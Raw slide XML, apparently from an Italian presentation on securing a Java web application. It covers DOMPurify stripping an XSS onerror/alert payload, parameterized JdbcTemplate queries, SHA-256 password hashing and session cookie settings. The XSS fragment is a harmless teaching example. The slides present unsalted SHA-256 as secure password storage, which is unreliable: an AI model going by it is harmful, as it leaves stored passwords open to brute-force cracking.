              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>In questo caso, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Dompurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> ha rilevato che l'attributo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> contiene un codice non consentito (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Attacked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>) e lo ha rimosso, lasciando solo l'attributo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> nel tag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> Questo impedisce l'esecuzione del codice dannoso nell'evento </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13AEC6E5-F1D1-FAEA-2D2B-82FD9F4B6911}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1369165" y="4486955"/>
            <a:ext cx="4617505" cy="1822405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448A3DDA-8532-05C1-9327-9493A6F63BE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3177637" y="6309360"/>
            <a:ext cx="5200622" cy="305406"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Immagine 9" descr="Immagine che contiene pianta da appartamento, vaso da fiori, pianta, palma&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24A9977D-DB62-CE03-A632-6384DF6E895F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect t="8997"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8696311" y="3558209"/>
            <a:ext cx="3455400" cy="3216964"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194118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Pro di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>DOMPurify</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b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Utilizzare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>DOMPurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> per la sanitizzazione dei dati in input offre diversi vantaggi:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>emplifica notevolmente il processo di sanitizzazione, in quanto la libreria si occupa di rilevare e rimuovere automaticamente i contenuti HTML non sicuri.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>DOMPurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> è stato ampiamente testato e utilizzato in molte applicazioni, garantendo un'efficace protezione contro gli attacchi XSS.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56975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Query parametrizzate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a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>Per prevenire gli attacchi SQL Injection sono stati utilizzate query parametrizzate con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>JdbcTemplate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>La query SQL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>in figura, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> è definita come una stringa che specifica l'inserimento dei valori nella tabella "user". I segnaposto (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>) sono utilizzati per rappresentare i parametri che verranno sostituiti con i valori effettivi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Utilizzando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>jdbcTemplate.update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>viene eseguita la query parametrizzata. La query e i valori dei parametri vengono forniti come argomenti al metodo update(). I valori dei parametri vengono sostituiti nei segnaposti durante l'esecuzione della query, trattandolo separatamente dalla query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>L'operazione di update() esegue la query di modifica dei dati nel database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> e r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>estituisce il numero di righe modificate o interessate dalla query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5" descr="Immagine che contiene testo, Software multimediale, software, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A0CB25E-73D4-C879-D209-E5C962EB6ED1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4704333" y="5273759"/>
            <a:ext cx="6827840" cy="1140899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125679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Crittografia delle password</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a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>Come ulteriore misura di sicurezza, si è proceduto ad implementare un metodo che permettesse di memorizzare le password non più in chiaro, ma una sua rappresentazione crittografica (hash). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
                <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>
              </a:rPr>
              <a:t>È stato implementato una funzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>hashPassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> password) che </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>utilizza l'algoritmo di hash SHA-256 per creare una rappresentazione crittografica della password fornita. L'hash risultante è una sequenza di byte che rappresenta univocamente la password in input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              <a:cs typeface="Apple Chancery" panose="03020702040506060504" pitchFamily="66" charset="-79"/>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44E89D38-14EF-7FE9-E81D-AA0B5F26DAF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1418710" y="4040243"/>
            <a:ext cx="4934980" cy="2575419"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Immagine 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3BA1E07-8369-579A-897D-8EF5AC9295BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="6092318"/>
            <a:ext cx="5647038" cy="434084"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1448312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Gestione sessione e cookie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400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>La configurazione dei cookie per la gestione dei cookie è stata migliorata, settando ulteriori attributi nel file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>application.properties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>max-age</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Questa proprietà imposta la durata massima del cookie di sessione in secondi. Nel caso in esame, il cookie di sessione avrà una durata massima di 3600 secondi (1 ora). Dopo questo periodo, il cookie di sessione scadrà.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>http-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>se è i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>mpostato su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, il cookie di sessione non sarà accessibile agli script JavaScript lato client.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>l browser rispetterà l'impostazione e impedirà agli script JavaScript di accedere al cookie di sessione tramite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>. Questa impostazione è un meccanismo di sicurezza importante per proteggere il cookie di sessione da potenziali attacchi di cross-site scripting (XSS). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ssere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> accessibile solo tramite HTTP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" i="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>-site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: Questa proprietà imposta l'attributo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> del cookie di sessione, utile per mitigare potenziali rischi di sicurezza come gli attacchi CSRF (Cross-Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
